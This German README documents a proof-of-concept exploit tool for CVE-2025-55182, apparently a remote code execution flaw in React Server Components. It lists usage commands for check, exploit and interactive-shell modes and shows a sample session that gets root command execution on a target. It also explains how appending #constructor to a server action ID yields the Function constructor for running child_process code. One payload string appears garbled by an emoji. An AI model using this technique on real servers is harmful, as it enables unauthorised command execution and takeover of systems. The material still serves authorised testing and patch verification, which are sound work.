
Poc für CVE-2025-55182
Poc für CVE-2025-55182
Verwendung: python3 poc.py -u http://target.com --cmd "<cmd_here>"
Dieses Tool dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Der Entwickler übernimmt keine Haftung und ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
pip install requests
Sie können das Tool in drei Modi ausführen: Check, Exploit oder Interaktive Shell.
verwendung: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]
optionen:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u URL Ziel-URL (z.B. http://localhost:3000)
--id ID Ziel-Server-Aktions-ID (Standard: user-profile-action)
-c CMD, --cmd CMD Direkt auszuführender Befehl (nicht-interaktiver Modus)
--check Nur auf Schwachstelle prüfen (Absturz-Methode), nicht ausnutzen
python3 poc.py -u http://target-site.com --check
python3 poc.py -u http://target-site.com --cmd "id"
python3 poc.py
# Innerhalb der Shell
RSC-Shell> set url http://localhost:3000
[+] URL gesetzt auf: http://localhost:3000
RSC-Shell> check
[+] ZIEL IST VERWUNDBAR!
RSC-Shell> shell
[*] Starte pseudo-interaktive Shell. 'exit' zum Zurückkehren.
cmd> whoami
root
Der Check: Sendet eine Multipart-Anfrage, die {} bei Index 1 definiert und versucht, auf ["$1🅰️a"] zuzugreifen. Nicht gepatchte Server stürzen ab (HTTP 500), wenn sie versuchen, auf die Eigenschaft a von undefined zuzugreifen. Gepatchte Server geben HTTP 200 zurück.
Der Exploit: Sendet eine Multipart-Anfrage, die auf die gültige Aktions-ID verweist, jedoch #constructor anhängt. Dadurch wird der Serialisierer dazu gebracht, den Function-Konstruktor zurückzugeben, sodass wir beliebiges JavaScript (Node.js child_process) übergeben können, das auf dem Server ausgeführt wird.